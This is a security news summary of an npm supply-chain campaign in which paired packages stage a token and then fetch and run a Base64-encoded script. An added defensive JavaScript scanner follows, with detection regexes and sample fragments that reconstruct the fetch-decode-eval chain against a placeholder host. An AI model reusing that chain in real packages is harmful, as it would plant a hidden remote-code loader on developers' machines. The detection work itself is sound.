"New Ongoing Campaign Targets npm Ecosystem with Unique Execution Chain"

Cybersecurity researchers have uncovered a new ongoing campaign targeting the npm ecosystem that uses a unique execution chain to deliver an unknown payload to victim systems. According to the software supply chain security company Phylum, the packages in question appear to be published in pairs, with each pair working together to retrieve additional resources that are then decoded and/or executed. Because the first of the two modules is designed to locally store a token retrieved from a remote server, the order in which the packages are installed is crucial to a successful attack. The second package sends this token, along with the operating system type, as a parameter to an HTTP GET request in order to retrieve a second script from the remote server. A successful execution returns a Base64-encoded string that is executed immediately, but only if the returned string is longer than 100 characters. This article continues to discuss the new ongoing campaign aimed at the npm ecosystem.
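The two-stage chain described above can be checked for with a static triage pass over package sources. The JavaScript below is an added example, not code from Phylum or the original article; the indicator regexes, the role labels, and the sample packages (`pkg-a-example`, `pkg-b-example`, `pkg-c-example`, host `example.invalid`) are constructed assumptions.

```javascript
// Added example (not from Phylum or the article): static triage for the paired
// "store token" / "fetch, Base64-decode, execute" pattern. Regexes are assumptions.
const INDICATORS = {
  networkFetch: /\bhttps?\.(get|request)\s*\(|\bfetch\s*\(|\baxios\b/,
  osFingerprint: /\bos\.(type|platform)\s*\(|\bprocess\.platform\b/,
  base64Decode: /Buffer\.from\s*\([^)]*['"]base64['"]|\batob\s*\(/,
  dynamicExec: /\beval\s*\(|\bnew\s+Function\s*\(|\b(exec|execSync|spawn)\s*\(/,
  localWrite: /\bfs\.(writeFile|writeFileSync)\s*\(/,
  localRead: /\bfs\.(readFile|readFileSync)\s*\(/,
};

// pkg = { manifest: <parsed package.json>, files: { path: sourceText } }
function auditPackage(pkg) {
  const hits = new Set();
  for (const src of Object.values(pkg.files)) {
    for (const [name, re] of Object.entries(INDICATORS)) {
      if (re.test(src)) hits.add(name);
    }
  }
  const has = (n) => hits.has(n);
  let role = "none";
  // First package in the pair: retrieves a token and stores it locally.
  if (has("networkFetch") && has("localWrite")) role = "token-stager";
  // Second package: fetches a reply, Base64-decodes it and executes it.
  if (has("networkFetch") && has("base64Decode") && has("dynamicExec")) role = "fetch-decode-execute";
  return { name: pkg.manifest.name, indicators: [...hits].sort(), role };
}

// Correlate reports: a stager plus an executor that reads local state is the pair.
function findPairs(reports) {
  const stagers = reports.filter((r) => r.role === "token-stager");
  const runners = reports.filter(
    (r) => r.role === "fetch-decode-execute" && r.indicators.includes("localRead"));
  return stagers.flatMap((s) => runners.map((r) => [s.name, r.name]));
}

// Constructed, non-functional source fragments used only as scanner input.
const SAMPLE_PACKAGES = [
  { manifest: { name: "pkg-a-example" }, files: { "index.js":
    "https.get(HOST + '/token', (res) => fs.writeFileSync(TOKEN_PATH, body));" } },
  { manifest: { name: "pkg-b-example" }, files: { "index.js":
    "const token = fs.readFileSync(TOKEN_PATH, 'utf8');\n" +
    "https.get(HOST + '/?t=' + token + '&os=' + os.type(), onBody);\n" +
    "if (body.length > 100) eval(Buffer.from(body, 'base64').toString());" } },
  { manifest: { name: "pkg-c-example" }, files: { "index.js":
    "fetch('https://example.invalid/api').then((r) => r.json());" } },
];
console.log(findPairs(SAMPLE_PACKAGES.map(auditPackage)));
```

Neither package looks complete on its own, which is why the correlation step matters: reviewing dependencies one at a time can miss a chain that only works when both halves are installed.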

THN reports "New Ongoing Campaign Targets npm Ecosystem with Unique Execution Chain"

Submitted by Anonymous on